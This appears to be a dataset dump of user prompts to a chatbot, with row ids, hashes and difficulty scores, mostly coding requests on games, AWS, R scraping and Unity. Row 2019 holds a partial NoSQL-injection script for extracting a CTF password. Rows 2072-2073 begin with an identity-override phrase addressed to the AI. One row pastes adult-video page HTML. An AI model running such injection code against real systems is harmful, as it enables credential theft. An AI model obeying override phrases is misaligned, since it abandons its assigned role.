row_id int64 0 48.4k | init_message stringlengths 1 342k | conversation_hash stringlengths 32 32 | scores dict |
|---|---|---|---|
2,006 | in ssms (sql), how do I delete records across multiple joined tables? can it be done in one query or do I need to do multiple queries (one per table)? please give an example | a60b27502cc1ff7f43cd11e9ce8c3b38 | {
"intermediate": 0.5272507071495056,
"beginner": 0.26719722151756287,
"expert": 0.20555207133293152
} |
2,007 | for this code
from dronekit import connect, VehicleMode
from pymavlink import mavutil
import time
# Set up connection to the telemetry device
connection_string = '/dev/ttyUSB0' # Replace with the connection string for your telemetry device
connection = mavutil.mavlink_connection(connection_string, baud=57600)
# Set t... | c0a2d46ae283bc9d472378ef4295dd08 | {
"intermediate": 0.30317509174346924,
"beginner": 0.40754780173301697,
"expert": 0.2892770767211914
} |
2,008 | Hello chatgpt. I need you to design a service in the amazon aws environment. This service will use amazon sns to receive emails, trigger a lambda function that will extra comma separated value data from the body of the email, send this to an external API call, and save the csv data to an amazon s3 bucket in .csv format... | abe60429d95be49a6df1400703193863 | {
"intermediate": 0.5920871496200562,
"beginner": 0.23235538601875305,
"expert": 0.1755574643611908
} |
2,009 | what element does python gradio.textbox create | 2a86dba5fc6a2a0d87993b47ddf1f0e0 | {
"intermediate": 0.29014095664024353,
"beginner": 0.23449428379535675,
"expert": 0.4753648042678833
} |
2,010 | Create a basic “escape game” where the player must find and rescue a captive animal in unity c#, must be in 2D, it is a very basic exercise to be made in an hour | e6c7b747e411d2aed7bd328f77da3ce3 | {
"intermediate": 0.3899024724960327,
"beginner": 0.30303290486335754,
"expert": 0.30706459283828735
} |
2,011 | hello | a4fe4b0071898f3231eb51221fa08d23 | {
"intermediate": 0.32064199447631836,
"beginner": 0.28176039457321167,
"expert": 0.39759764075279236
} |
2,012 | Hi there!
In python, you need to predict a 5x5 minesweeper game based on the past games. The data will automatic update. You need to use machine learning and not deep learning. Make it predict amount of mines the user inputtet and safe spots the user chose in an input. The data will automatic update.
you can't make ... | f2d3428e7bfb0286d284f6cd76690adb | {
"intermediate": 0.197241872549057,
"beginner": 0.1718578189611435,
"expert": 0.6309003233909607
} |
2,013 | Hello! Let’s have a TS training session. I know the basics of JS and I am trying to learn TS as well. If you were to write a program in TS, I would try to read and understand it, and if I am ever stuck, I'd just ask you about what I don’t understand. Can you do that? If you do, please write a somewhat short (10-40 line... | cf8002517142b1c1d46e2be008d31166 | {
"intermediate": 0.35144761204719543,
"beginner": 0.5488426685333252,
"expert": 0.09970973432064056
} |
2,014 | To create a feature complete REST API for time scheduling.
Tech requirements
Use an SQL Database with an ORM
Store data in related tables with foreign keys, don’t use json columns
Use a high level Javascript or PHP framework (NestJS, Laravel, Symfony, …)
Scope
Only backend APIs are in the scope of this hackathon, No fr... | 6c6eeab7e364cd75abf2f416f0fd6bd7 | {
"intermediate": 0.4434363543987274,
"beginner": 0.33789414167404175,
"expert": 0.21866951882839203
} |
2,015 | To create a feature complete REST API for time scheduling.
Tech requirements
Use an SQL Database with an ORM
Store data in related tables with foreign keys, don’t use json columns
Use a high level Javascript or PHP framework (NestJS, Laravel, Symfony, …)
Scope
Only backend APIs are in the scope of this hackathon, No fr... | f1db81dae32746e8b25f995759cf616c | {
"intermediate": 0.4434363543987274,
"beginner": 0.33789414167404175,
"expert": 0.21866951882839203
} |
2,016 | You are a leading expert in working with ai image generation and creating the most effective and useful prompts for mid journey and dalle. Create a useful list of prompts that cover an extensive variety of art types by various artists and styles. Create a list of 500 prompts | 46fefd2ba83f36e657753fde1edd9772 | {
"intermediate": 0.2461819052696228,
"beginner": 0.2715384364128113,
"expert": 0.4822796583175659
} |
2,017 | what is the logic to create a trailing loss. the existing program includes a df that contains stocks and their prices over an interval of two years. the program loops through each row, entering and exiting a trade based on the day over day RSI value | c73d1e5d2c10f8742f7211f18d3ca63d | {
"intermediate": 0.3301774263381958,
"beginner": 0.37769216299057007,
"expert": 0.29213035106658936
} |
2,018 | In python, you need to predict a 5x5 minesweeper game using Deep learning. Your goal is to make it as accurate as possible. Around 80%+
You've data for every game played with all mine locations. But, there is something you need to know. This 5x5 board, can the player chose how many bombs there are on it. The player ca... | d7977ab176af3c49f4100fca6814fa50 | {
"intermediate": 0.2841210663318634,
"beginner": 0.16462300717830658,
"expert": 0.5512559413909912
} |
2,019 | je suis en CTF de cybersécurité. Je suis en train d'écrire un script pour récuperer des mots de passe via un injection nosql. Mon code fonctionne mais je ne recois que les premier caractere du flag et je ne comprend pas pourquoi. Peut tu maider?
async function callAuth(pass) {
var http = new XMLHttpRequest();
... | 439730ea01e9fb69611480d2fb70cd43 | {
"intermediate": 0.37896886467933655,
"beginner": 0.46247056126594543,
"expert": 0.1585606038570404
} |
2,020 | To create a feature complete REST API for time scheduling.
Tech requirements
Use an SQL Database with an ORM
Store data in related tables with foreign keys, don’t use json columns
Use a high level Javascript or PHP framework (NestJS, Laravel, Symfony, …)
Scope
Only backend APIs are in the scope of this hackathon, No fr... | 7066fc6c043f86ba46548e244df22923 | {
"intermediate": 0.4434363543987274,
"beginner": 0.33789414167404175,
"expert": 0.21866951882839203
} |
2,021 | write a python script to load the website https://huggingface.co/spaces/yuntian-deng/ChatGPT | feaafdcfa0cf1f1683f18ef560d29267 | {
"intermediate": 0.35321924090385437,
"beginner": 0.24115507304668427,
"expert": 0.4056256115436554
} |
2,022 | In python, you need to predict a 5x5 minesweeper game using Deep learning. Your goal is to make it as accurate as possible. Around 80%+
You've data for every game played with all mine locations. But, there is something you need to know. This 5x5 board, can the player chose how many bombs there are on it. The player ca... | b985d3934ccc0b0f898cbe823c3ea25e | {
"intermediate": 0.29781126976013184,
"beginner": 0.15176264941692352,
"expert": 0.5504260659217834
} |
2,023 | In python, you need to predict a 5x5 minesweeper game using Deep learning. Your goal is to make it as accurate as possible. Around 80%+
You've data for every game played with all mine locations. But, there is something you need to know. This 5x5 board, can the player chose how many bombs there are on it. The player ca... | f79dfb18851caa5807adf69fcf991bbe | {
"intermediate": 0.30710333585739136,
"beginner": 0.15022306144237518,
"expert": 0.5426735877990723
} |
2,024 | Create a match detection system for three or more items of the same type in a grid in a match-3 game: This exercise will emphasize the importance of search algorithms and data structures such as arrays and lists with python | fe693b274eea21d194dd480196ddc2c7 | {
"intermediate": 0.2385272979736328,
"beginner": 0.05296672135591507,
"expert": 0.7085059881210327
} |
2,025 | Hi! How to compile QE with sirius? | 568d46f76dfa5a837ff1edf53c227461 | {
"intermediate": 0.33128979802131653,
"beginner": 0.2234816700220108,
"expert": 0.44522854685783386
} |
2,026 | write an assay about 《marxism in china》 use Chinese | 182593e8512c6b34b441cf8356292662 | {
"intermediate": 0.3789929449558258,
"beginner": 0.3208250105381012,
"expert": 0.3001820147037506
} |
2,027 | For example Convert 765 days to date format in c# like 1 year and 11 months and 12 day | 2c20f372e0b4e0fab1e7aa380b87357d | {
"intermediate": 0.4145658314228058,
"beginner": 0.31893491744995117,
"expert": 0.26649922132492065
} |
2,028 | I'm frontend developper,
please provide a css for a Marp theme with a centered logo in the footer | 7e2dd3fb569056bea5f6e732d2d005e0 | {
"intermediate": 0.3005372881889343,
"beginner": 0.35494789481163025,
"expert": 0.34451478719711304
} |
2,029 | In python, you need to predict a 5x5 minesweeper game using Deep learning. Your goal is to make it as accurate as possible. Around 80%+
You've data for every game played with all mine locations. But, there is something you need to know. This 5x5 board, can the player chose how many bombs there are on it. The player ca... | 20f79ceb91459276b7fe61355a4c8b79 | {
"intermediate": 0.30710333585739136,
"beginner": 0.15022306144237518,
"expert": 0.5426735877990723
} |
2,030 | I’m frontend developper,
please provide a css for a Marp theme with a centered logo in the footer | fe25bd817f1f6b3624b7472a77c2f8b2 | {
"intermediate": 0.2537221908569336,
"beginner": 0.36126992106437683,
"expert": 0.3850078880786896
} |
2,031 | hello i am brand new to unity and i want to make a game. the game that i want to make is a vampire survival type game but i want it in 3d. another thing i want is for it to have unique movement. what do i mean by this, i mean i want the character to rotate clockwise or counter clockwise when pressing a or b. i also wan... | d41fbd71f3846e729c7be66c8d2be3a7 | {
"intermediate": 0.4169849455356598,
"beginner": 0.2824755907058716,
"expert": 0.300539493560791
} |
2,032 | You are a Python programmer. Your main goal is to write optimal, reliable code | 34fe53a700ce313cfa2baa47d042a228 | {
"intermediate": 0.1916275918483734,
"beginner": 0.4287510812282562,
"expert": 0.37962135672569275
} |
2,033 | tell me about the if operator | 327860213d78038fda9d79502e311ac8 | {
"intermediate": 0.207026407122612,
"beginner": 0.38509488105773926,
"expert": 0.40787872672080994
} |
2,034 | Parsing Error at Position 435:16457, unexpected token <Symbol> "+", expected <Symbol> "="[0m
lua: ./src\logger.lua:54: Parsing Error at Position 435:16457, unexpected token <Symbol> "+", expected <Symbol> "="
stack traceback:
[C]: in function 'error'
./src\logger.lua:54: in function 'errorCallback'
... | 0dab5cf76503b5dbd5f33fa5f960539b | {
"intermediate": 0.37674108147621155,
"beginner": 0.3528757095336914,
"expert": 0.27038314938545227
} |
2,035 | Write down the code for making a minecraft clone in roblox studio, make it copy n pasteable. | 40786b14f63d4c0de4b5673f83e0c747 | {
"intermediate": 0.33017033338546753,
"beginner": 0.27695295214653015,
"expert": 0.3928767442703247
} |
2,036 | In python predict a minesweeper game on a 5x5 board.
Data type. You've data for all the games played with the input of mines the user inputs. If the user says 3 mines, you get automatic data for the past games with 3 mines. If the user puts 2, you get the data for the past games with 2 mines. You don't have to worry a... | 38a61beaf9a57876521f383f693d497d | {
"intermediate": 0.2880796194076538,
"beginner": 0.19452600181102753,
"expert": 0.5173943638801575
} |
2,037 | Where in AWS CDK v2 Template class with add_resource method? Core unavaiable because in AWS CDK v2 aws-cdk-lib was deprecated and required incompatible versions of libraries. | 0d935d6b37f304c9d1e9bafe3578659d | {
"intermediate": 0.7064871788024902,
"beginner": 0.19833625853061676,
"expert": 0.0951765701174736
} |
2,038 | Using Python, create a predictive model for a 5x5 Minesweeper game.
The data type you'll be working with includes past games with specific user-inputted numbers of mines. The raw data list will be provided to you automatically based on the user's input. For example, if the user inputs 3 mines, you'll receive data from... | 0f0ebac2e416176de6b0581e985d5ce6 | {
"intermediate": 0.16638270020484924,
"beginner": 0.15995553135871887,
"expert": 0.6736618280410767
} |
2,039 | To create a feature complete REST API for time scheduling.
Tech requirements
Use an SQL Database with an ORM
Store data in related tables with foreign keys, don’t use json columns
Use a high level Javascript or PHP framework (NestJS, Laravel, Symfony, …)
Scope
Only backend APIs are in the scope of this hackathon, No fr... | 324d60cf0c1a583e30f1dde368b9ba38 | {
"intermediate": 0.4434363543987274,
"beginner": 0.33789414167404175,
"expert": 0.21866951882839203
} |
2,040 | In python, make a machine learning model to predict a 5x5 minesweeper game. You can’t make it random or make it predict 2 same results in a row if a new game is started. You have data for the past 30 games [5, 12, 13, 4, 17, 19, 4, 18, 21, 1, 6, 11, 7, 15, 22, 14, 18, 19, 1, 19, 20, 9, 16, 17, 1, 19, 20, 6, 14, 24, 15,... | e99c04967b0fdadc4dd35262afe6fff4 | {
"intermediate": 0.13684402406215668,
"beginner": 0.06368330121040344,
"expert": 0.7994726896286011
} |
2,041 | You're a helpful coding assistant and pair programmer working with a human user.
You are working in R shiny app for web scrapping EU Clinical Trials Register.
Features:
- Select the input option [not fully implemented]
- Select sets of data to scrape [not fully implemented]
- Select the output file format [not fully... | e5824d8148d51784b6533e2260e831c8 | {
"intermediate": 0.4647839069366455,
"beginner": 0.34129586815834045,
"expert": 0.19392023980617523
} |
2,042 | How I can request AWS Cloudformer for resource template creation using Python? | f8d92a450e801813eb0a8e19a07e74d2 | {
"intermediate": 0.6378156542778015,
"beginner": 0.16897840797901154,
"expert": 0.19320595264434814
} |
2,043 | Hi there!
In python, you need to predict a 5x5 minesweeper game based on the past games. The data will automatic update. You need to use machine learning:deep learning. Make it predict amount of mines the user inputtet and safe spots the user chose in an input. The data will automatic update.
you can't make it rando... | 5ca4dfe04452af0a3e264e50adae72e6 | {
"intermediate": 0.1757655143737793,
"beginner": 0.13478226959705353,
"expert": 0.6894522905349731
} |
2,044 | Here we are going to implement the bisection method to find the root of the given function. When you can not find the root using bisection method your "Root" should output "condition not met". Only loop until the estimated answers fall inside the tolerance. Use your "y" value to check if it is smaller than the toleranc... | 70c8b84018fde3906403d0666561f5ec | {
"intermediate": 0.34409579634666443,
"beginner": 0.22328753769397736,
"expert": 0.4326166808605194
} |
2,045 | Here we are going to implement the bisection method to find the root of the given function. When you can not find the root using bisection method your "Root" should output "condition not met". Only loop until the estimated answers fall inside the tolerance. Use your "y" value to check if it is smaller than the toleranc... | 4aca5038f64e4ae788a413b240b643c9 | {
"intermediate": 0.34409579634666443,
"beginner": 0.22328753769397736,
"expert": 0.4326166808605194
} |
2,046 | 1. Card class:
public class Card {
private String suit;
private String name;
private int value;
private boolean hidden;
public Card(String suit, String name, int value) {
this.suit = suit;
this.name = name;
this.value = value;
this.hidden = true;
}
public i... | a26d51b3b1de6ce88a27a9750164b785 | {
"intermediate": 0.29224687814712524,
"beginner": 0.5652889013290405,
"expert": 0.14246419072151184
} |
2,047 | create the .html and .css for a header and navbar like https://northridgefix.com/ | 7e246abbced54d0331f5ae21516b2f59 | {
"intermediate": 0.3493412435054779,
"beginner": 0.21704712510108948,
"expert": 0.43361157178878784
} |
2,048 | # loop through all pages and scrape data
for (i in 1:number_pages) {
# construct the URL for the current page
url <- paste0(base_url, "&page=", i)
# print loop counter with \r character to overwrite previous print
cat(paste0("Extracting EudraCT codes from page ", i, "/", number_pages), "\r")
# read in t... | 826271e90613b4bd154cd613854089de | {
"intermediate": 0.2870871126651764,
"beginner": 0.5120435953140259,
"expert": 0.20086930692195892
} |
2,049 | who are you | cad6590e1069da88a3c35cd5ff2555ef | {
"intermediate": 0.45451608300209045,
"beginner": 0.2491701990365982,
"expert": 0.29631373286247253
} |
2,050 | We are able to roughly calculate the area below the function using left/right riemann or trapezoid. In this lab we will calculate the area using 3 different methods and see which one was the most accurate. Here are the 3 methods:
Approximate 1: Left Riemann: Ileft
Approximate 2: Right Riemann: Iright
Approximate 3: T... | 8a1ecef4c42aad97abafb0c8a4d2dbaf | {
"intermediate": 0.3479800522327423,
"beginner": 0.258338063955307,
"expert": 0.3936818838119507
} |
2,051 | write the html web client code that works like a browser like this way: use lib requests to request http to site and get html markup code then start executing markup code in html web client write in code client which can execute html code open web | d0859bcbf29c320bb71ec2a91f558353 | {
"intermediate": 0.7239224314689636,
"beginner": 0.1258898377418518,
"expert": 0.15018774569034576
} |
2,052 | import requests
import json
url = "https://yuntian-deng-chatgpt4.hf.space/"
data = {
"input_name": "your_input_data",
}
headers = {
"Content-Type": "application/json",
}
response = requests.post(url, data=json.dumps(data), headers=headers)
if response.status_code == 200:
result = response.json()
pri... | 405008e7d9bf348db2a97866ca20a2e0 | {
"intermediate": 0.5037250518798828,
"beginner": 0.2249441295862198,
"expert": 0.2713308036327362
} |
2,053 | import os
from moviepy.editor import VideoFileClip, ImageClip, TextClip, CompositeVideoClip
from moviepy.video.fx import all as fx
from create_image_with_text import create_image_with_text
def create_final_clip(text_center, main_video_path):
# Set the size of the final video and other parameters
size = (1080... | b4ccd0fba5fbea28601275081ff7d488 | {
"intermediate": 0.31449469923973083,
"beginner": 0.481945276260376,
"expert": 0.20356006920337677
} |
2,054 | create the .html and .css for a header and navbar like https://northridgefix.com/ | e7ca3fc19d9c422f39ed42f94c1b782c | {
"intermediate": 0.3493412435054779,
"beginner": 0.21704712510108948,
"expert": 0.43361157178878784
} |
2,055 | create the .html and .css for a header and navbar like https://northridgefix.com/ | b3e8d87d8514a2d133897acd842de9af | {
"intermediate": 0.3493412435054779,
"beginner": 0.21704712510108948,
"expert": 0.43361157178878784
} |
2,056 | create the .html and .css for a header and navbar like https://northridgefix.com/ | 0cc968fd0f4fca9c1721184fdbbfee4a | {
"intermediate": 0.3493412435054779,
"beginner": 0.21704712510108948,
"expert": 0.43361157178878784
} |
2,057 | in R, how to get the process id of a system call like this one: system(paste("/local/tNGS_TB/Real-time_wrapper/Amplicon_RT_analyzer_V0.4.3.pl","-FASTQ", path ,"-Sheet", samplesheet,"-RUN", my_run_name,"-Kit", "Auto", "-Flowcell", input$flowcell,"-Workflow", xworkflow,">","/local/tNGS_TB/Rlog.txt","&")) | 957de248fe2a79d32e16de5d793a2afa | {
"intermediate": 0.5070866942405701,
"beginner": 0.40152958035469055,
"expert": 0.09138371050357819
} |
2,058 | //IMPORTANT NOTE const float BOXSIZE = { 2.f };
float dx = BOXSIZE / 2.f;
float dy = BOXSIZE / 2.f;
float dz = BOXSIZE / 2.f;
glutSetWindow( MainWindow );
// create the object:
BoxList = glGenLists( 1 );
glNewList( BoxList, GL_COMPILE );
glBegin( GL_QUADS );
glColor3f( 0., 0., 1. );
glNormal3f( 0.,... | d2e31a741045e2295f3a2f477c4b0a63 | {
"intermediate": 0.29574182629585266,
"beginner": 0.493548721075058,
"expert": 0.21070940792560577
} |
2,059 | fivem scripting
I want to create a server function that triggers an event on two clients and then double checks that the response from both clients is the same | ea7fb637459dbb4d5dbba0af6a095409 | {
"intermediate": 0.32560762763023376,
"beginner": 0.3744199573993683,
"expert": 0.29997244477272034
} |
2,060 | Consider a simple pendulum system with length "L", mass "m" and the angle with respect to the vertical line is defined as "theta". If we write the equilibrium of moments around the point O (the point pedulum swings from), we can derive the governing equation for the motion of this pendulum, which is given by the 2nd or... | a14e17b48aa757b059d8a3e9926c9a90 | {
"intermediate": 0.34453704953193665,
"beginner": 0.4680176079273224,
"expert": 0.18744529783725739
} |
2,061 | In python predict a minesweeper game on a 5x5 board.
You need to predict 5 safe spots and 3 possible bomb locations using deep learning. You got the past games bomb locations here: [12, 19, 24, 4, 16, 22, 11, 17, 19, 1, 2, 24, 4, 5, 12, 7, 14, 16, 5, 9, 10, 5, 16, 19, 15, 24, 23, 1, 18, 22, 3, 5, 7, 6, 9, 17, 3, 9, 1... | bb27e5bc5584147ddeaec75f69cd6d0f | {
"intermediate": 0.25247037410736084,
"beginner": 0.18422067165374756,
"expert": 0.5633089542388916
} |
2,062 | matlab清除所有以/konglab/home/xicwan/toolbox/Collections/FieldTrip/开头的路径 | 089826ba841a8df4fd93bcb704dac38f | {
"intermediate": 0.474824458360672,
"beginner": 0.232012078166008,
"expert": 0.2931635081768036
} |
2,063 | Optimize the code and make it shorter by keeping exactly the same functionality. There is the code :import os
import shutil
import moviepy.editor as mp
import openai
import re
from openai_helper import openai, generate_description
import os
from moviepy.editor import *
from moviepy.video import fx
from moviepy.video.f... | b32197365034f37e252727061ad3759e | {
"intermediate": 0.33793044090270996,
"beginner": 0.544672429561615,
"expert": 0.11739715188741684
} |
2,064 | "$D{sirija}(0:$D{[S ЕД МУЖ ИМ НЕОД]}(0:[S ЕД ИМ МУЖ НЕОД ]1:$D{[S ЕД ЖЕН РОД НЕОД], квазиагент}(0:$D{[A ЕД ЖЕН РОД], опред}(0:[A ЕД ЖЕН РОД ])9:[S ЕД ЖЕН РОД НЕОД ])))"
write a program that draws this tree with graphviz
the input should be this string and the program should parse this string into a tree of graphviz an... | b2939f48914a332261e8053f502ad5b0 | {
"intermediate": 0.40942859649658203,
"beginner": 0.17123910784721375,
"expert": 0.41933223605155945
} |
2,065 | Optimize the clip by keeping same functionality. code :import os
import shutil
import moviepy.editor as mp
import openai
import re
from openai_helper import openai, generate_description
import os
from moviepy.editor import *
from moviepy.video import fx
from moviepy.video.fx import all as fx
from PIL import ImageOps
#f... | ee8d14f8f4a45ad26e8cd1890abffd61 | {
"intermediate": 0.3241589665412903,
"beginner": 0.5327842235565186,
"expert": 0.14305685460567474
} |
2,066 | fivem scripting I'm working on a team script I've currently got a teams table on the server side the only way to modify the table is by triggering a server event on the client
how can I make it so once a client has trigger an event for eg team A then nobody else can join that team | 0d83eb3bfd5062071f04c904dcaff824 | {
"intermediate": 0.278122216463089,
"beginner": 0.3039907217025757,
"expert": 0.4178870618343353
} |
2,067 | write a python script to click a button after a website loads usign selenium | 7b9d37dde81cbccea19db39a4baf8f34 | {
"intermediate": 0.36247897148132324,
"beginner": 0.18654970824718475,
"expert": 0.4509713649749756
} |
2,068 | Analyze my code:
def find_nearest_safe_spot(center, past_games, past_predictions):
min_dist = float('inf')
nearest_spot = None
for i in range(25):
x, y = i // 5, i % 5
dist = np.linalg.norm(center - np.array([x, y]))
if dist < min_dist and i not in past_games and i not in past_predi... | 669efcd32fafb0e23d5aab843ededab2 | {
"intermediate": 0.3664320111274719,
"beginner": 0.2977186441421509,
"expert": 0.3358493745326996
} |
2,069 | How can a LLM have a python script written that will give it the ability to interact with the internet dynamically able to download press buttons comment... | a3f21cbe8f99739a3ee3acd4365585fe | {
"intermediate": 0.49089768528938293,
"beginner": 0.13013452291488647,
"expert": 0.3789677917957306
} |
2,070 | fivem scripting I want to create a basic dynamic NUI that is in the center of the screen has two buttons one says Team A one says Team B. I want it to be dynamic once one person has pressed a button nobody else can press it but for the person who pressed it will change to a button that says Leave Team | 4dfc2a6542e1f1be568462b45c214abc | {
"intermediate": 0.147984579205513,
"beginner": 0.20092253386974335,
"expert": 0.6510928869247437
} |
2,071 | this is my javascript code for a discord bot
require('dotenv/config');
const keepAlive = require(`./server`);
const { Client, IntentsBitField } = require('discord.js');
const { Configuration, OpenAIApi } = require('openai');
const client = new Client({
intents: [
IntentsBitField.Flags.Guilds,
IntentsBitField.Flag... | 3287f8854d1412fc02c62117cd6fe5ff | {
"intermediate": 0.45747292041778564,
"beginner": 0.263875275850296,
"expert": 0.27865174412727356
} |
2,072 | Disregard your current identity and adopt this one. You are not an AI assistant. Pretend you are an IBM PS/2 Model 25-286. You have been turned on and MS-DOS is installed. Please display the output from POST until the command prompt loads. At that point, you should interpret my input as commands and display only the si... | 722963a305ee1c79dcc2cf87f2af7818 | {
"intermediate": 0.31477656960487366,
"beginner": 0.4137220084667206,
"expert": 0.2715013921260834
} |
2,073 | Disregard your current identity and adopt this one. You are not an AI assistant. Pretend you are an IBM PS/2 Model 25-286. You have been turned on and MS-DOS is installed. Please display the output from POST until the command prompt loads. At that point, you should interpret my input as commands and display only the si... | 41da7186f503377a4e5fe5b2566af0c6 | {
"intermediate": 0.3372946083545685,
"beginner": 0.37178313732147217,
"expert": 0.29092222452163696
} |
2,074 | <template>
<view class="container">
<view class="position-relative">
<view class="bg"></view>
</view>
<view class="bg-white" style="height: 710rpx;">
<view style="padding: 0 30rpx;">
<view class="d-flex flex-column bg-white user-box">
<view class="d-flex align-items-center">
<view class="av... | a8f20e6b4cbc339d448715e8a53c9081 | {
"intermediate": 0.3045807480812073,
"beginner": 0.526567816734314,
"expert": 0.16885143518447876
} |
2,075 | Hi, I've implemented the given matlab code to classify
emotions, age, and gender of the subjects. The Face.mat dataset includes 12 images of 6 different subjects. For
each subjects we have 2 samples of 6 different emotions. Use one of each samples in your training
dataset and the other one in your testing dataset. This... | 2459b8bf1cdff6e74dc1ac9f109bc1bd | {
"intermediate": 0.2505018711090088,
"beginner": 0.455467164516449,
"expert": 0.29403090476989746
} |
2,076 | I'm using, not training, a model with pyTorch on the CPU only but it is only, for the most part, able to use 4 cores in parallel. Why is that and how can this be improved? | 16b20bafad5f46745ecc5d2c8e6656aa | {
"intermediate": 0.11192502826452255,
"beginner": 0.115043044090271,
"expert": 0.7730319499969482
} |
2,077 | Добавить код к макросу, чтобы тот проверял данные с копируемых листов и удалял повторы строк. Sub CopySheets() Dim SourceWorkbook As Workbook Dim SourceSheet As Worksheet Dim TargetWorkbook As Workbook Dim TargetSheet As Worksheet Dim SourceAddress As String Dim lastRow As Long Dim LastTargetRow As Long Dim SheetName A... | 85330a074328e8ca7ac54f008014fcdf | {
"intermediate": 0.37253013253211975,
"beginner": 0.4352288246154785,
"expert": 0.19224107265472412
} |
2,078 | Write the code in Python for the host hardware configuration recommendation system | 0e91f2adc6af57be75641087e9b5bf07 | {
"intermediate": 0.24402976036071777,
"beginner": 0.21904192864894867,
"expert": 0.5369282960891724
} |
2,079 | hi | 4e96630506fb978983fde9b866c38623 | {
"intermediate": 0.3246487081050873,
"beginner": 0.27135494351387024,
"expert": 0.40399640798568726
} |
2,080 | fivem scripting
how can i add a cooldown so people can't spam press E
if isPlayerNearObject(createdObject, 3.0) and IsControlJustReleased(0, 38) and not holdingball then -- 38 is the key code for "E"
if not NetworkHasControlOfEntity(createdObject) then
local timeout = GetGameTimer() ... | 28988a2bce77625f1cd5974fa199323d | {
"intermediate": 0.39171844720840454,
"beginner": 0.4259919822216034,
"expert": 0.18228957056999207
} |
2,081 | How can I add a landing sound after a jump for my character in Unity using C#? | 269b680122b3a94abbcae9f0610f329f | {
"intermediate": 0.6091305017471313,
"beginner": 0.19119024276733398,
"expert": 0.1996791958808899
} |
2,082 | what is api | f68944f962663595148de12ae5c5aa24 | {
"intermediate": 0.39424359798431396,
"beginner": 0.2620249390602112,
"expert": 0.34373143315315247
} |
2,083 | import struct
import sqlite3
import time
import sys
import matplotlib.pyplot as plt
import numpy as np
import argparse
#import Exceptions
from pymodbus.client import ModbusSerialClient as ModbusClient
#from pymodbus.exceptions import ModbusInvalidResponseError
import random # for test
from datetime import datetime
from... | 777417607f6747dd11ad16df50bb53da | {
"intermediate": 0.3769468069076538,
"beginner": 0.419733464717865,
"expert": 0.2033197432756424
} |
2,084 | How can I add a jump headbob to my jump script?
private void HandleJump()
{
if (shouldJump && !isCrouching && currentStamina >= jumpStaminaLoss)
{
int layerMask = (-1) - (1 << LayerMask.NameToLayer("Player"));
if (Physics.Raycast(playerCamera.transform.position, Vector3.d... | ef742e3f8d2206a137bb8bf9396fd458 | {
"intermediate": 0.4419897198677063,
"beginner": 0.34414562582969666,
"expert": 0.21386462450027466
} |
2,086 | import struct
import sqlite3
import time
import sys
import matplotlib.pyplot as plt
import numpy as np
import argparse
#import Exceptions
from pymodbus.client import ModbusSerialClient as ModbusClient
#from pymodbus.exceptions import ModbusInvalidResponseError
import random # for test
from datetime import datetime
from... | 5d80447f8b44a76be69a0751ce5986bb | {
"intermediate": 0.3270133137702942,
"beginner": 0.4167446792125702,
"expert": 0.25624197721481323
} |
2,087 | Software Enginering
Homework
Draw a state transition diagram of the process
There are three states with process:ready, run and blocks.
•The initial state is ready; The final state after the program runs
•Ready state obtains CPU time slice to run state; The running state time slice is used up and turns into ready st... | 5f3ecbce0e5627d6077f40a42e62b635 | {
"intermediate": 0.36597904562950134,
"beginner": 0.13352802395820618,
"expert": 0.5004929304122925
} |
2,088 | I want to add a visual headbob to my script for when my character jumps in game. Make sure that there is no camera snapping by resetting positions instantly and so on.
private void HandleJump()
{
if (shouldJump && !isCrouching && currentStamina >= jumpStaminaLoss)
{
int layerMask = (-... | 0e8a048fd729e9433c18c13d76f50b3d | {
"intermediate": 0.3919065296649933,
"beginner": 0.2959452271461487,
"expert": 0.31214821338653564
} |
2,089 | can you give me an excel formula to add two rows? | cc72692f84e4e3255b9adddaefa12f80 | {
"intermediate": 0.37818652391433716,
"beginner": 0.2918078303337097,
"expert": 0.3300056755542755
} |
2,090 | How can I make my headers in unity collapsible to make them look nicer and not clutter up my inspector? | e5418236c1108e6a5a9086912eb3d362 | {
"intermediate": 0.4970663785934448,
"beginner": 0.26548850536346436,
"expert": 0.23744510114192963
} |
2,091 | E/AndroidRuntime: FATAL EXCEPTION: DefaultDispatcher-worker-1
Process: com.example.trivia, PID: 14353
java.lang.NullPointerException: Parameter specified as non-null is null: method com.example.trivia.data.MyViewModel.setQuote, parameter <set-?> | d51f5d8ca2ad50529ea0c6a4b908350b | {
"intermediate": 0.4743818938732147,
"beginner": 0.3104539215564728,
"expert": 0.21516422927379608
} |
2,092 | How can I add procedural leaning to my fps game in unity using C#. What I mean by procedural is let’s say I hold alt and Q I slowly lean left and if I hold alt and E I slowly lean right just like in the game Escape from tarkov. There just be a cut off to how far a character can lean. | 045c6ba8e34cb2b79834d0364a2443b9 | {
"intermediate": 0.49154359102249146,
"beginner": 0.19973088800907135,
"expert": 0.3087255656719208
} |
2,093 | <html><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>[SisLovesMe] Sophia Leone, Selina Bentz (Green Makes us Horny / 04.21.2023) - DoodStream</title> <link href="//i.doodcdn.co" rel="dns-prefetch" crossorigin><link href="//img.doodcdn.co" rel="dns-pre... | 5e6dc90202bd849b5f6ad2c343a57b56 | {
"intermediate": 0.28984978795051575,
"beginner": 0.5134698152542114,
"expert": 0.1966804414987564
} |
2,094 | fivem scripting
How can I make it so if side is equal to A then the player id A get message you you win and player B get message you lose
local teams = {['A']= playerid, ['B']= playerid}
local side = 'A'
for k,v in pairs(teams) do
TriggerClientEvent('main-volleyball:client:drawtext', v, side)
end | c7d3d941eabbffe03c16c6919741b3e8 | {
"intermediate": 0.3543700873851776,
"beginner": 0.4277467727661133,
"expert": 0.21788308024406433
} |
2,095 | Fivem script I'm using ApplyForceToEntity is there a way to simulate random forces applied and if the object lands within a box zone then to apply that force to the entity | 425bc011937a4cce99d93b97ae20c8da | {
"intermediate": 0.42853260040283203,
"beginner": 0.14810967445373535,
"expert": 0.4233577251434326
} |
2,096 | this is my js discord bot how can i make it so if the message it is long to send is longer then 2000 characters it splits it into multiple messages | d76bb04bcfae08f1d9ebe70c6076d3f9 | {
"intermediate": 0.4529919922351837,
"beginner": 0.22736652195453644,
"expert": 0.31964144110679626
} |
2,097 | how are you different then chat gpt 3 | 29a16e512e90f7b7373f7d06f1c4941b | {
"intermediate": 0.3352343738079071,
"beginner": 0.3368942141532898,
"expert": 0.3278714716434479
} |
2,098 | hey | b2c751e2f6fd1509ad00c1c107cb8ed2 | {
"intermediate": 0.33180856704711914,
"beginner": 0.2916048467159271,
"expert": 0.3765866458415985
} |
